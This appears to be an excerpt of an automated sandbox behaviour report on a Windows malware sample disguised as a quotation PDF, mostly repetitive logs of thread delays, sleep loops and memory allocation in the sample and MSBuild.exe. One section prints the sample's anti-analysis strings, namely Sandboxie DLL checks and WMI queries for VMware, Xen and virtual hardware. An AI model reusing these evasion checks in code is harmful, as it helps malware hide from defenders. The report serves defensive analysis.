Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORER?SBIEDLL.DLL@SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREAVERSIONBSERIALNUMBERDVMWARE\|VIRTUAL\|A M I\|XENESELECT * FROM WIN32_COMPUTERSYSTEMFMANUFACTURERGMODELHMICROSOFT\|VMWARE\|VIRTUALIJOHNJANNAKXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory allocated: 13736120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory allocated: 1374FB70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 250E06C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Memory allocated: 250FA0E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596731	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595414	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597758	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597633	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 1461	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Window / User API: threadDelayed 8356	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1854	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7974	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7628	Thread sleep count: 1461 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7628	Thread sleep count: 8356 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -96188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596731s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595414s >= -30000s	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7520	Thread sleep count: 85 > 30	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7720	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 1508	Thread sleep count: 1854 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 1508	Thread sleep count: 7974 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597996s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597758s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597633s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595735s >= -30000s	Jump to behavior
